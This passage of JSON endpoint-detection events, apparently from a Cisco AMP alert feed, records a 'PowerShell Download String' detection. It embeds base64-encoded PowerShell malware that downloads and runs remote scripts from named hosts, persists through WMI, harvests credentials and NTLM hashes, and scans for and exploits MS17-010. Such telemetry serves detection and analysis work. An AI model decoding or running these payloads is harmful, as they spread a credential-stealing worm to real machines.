ABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhA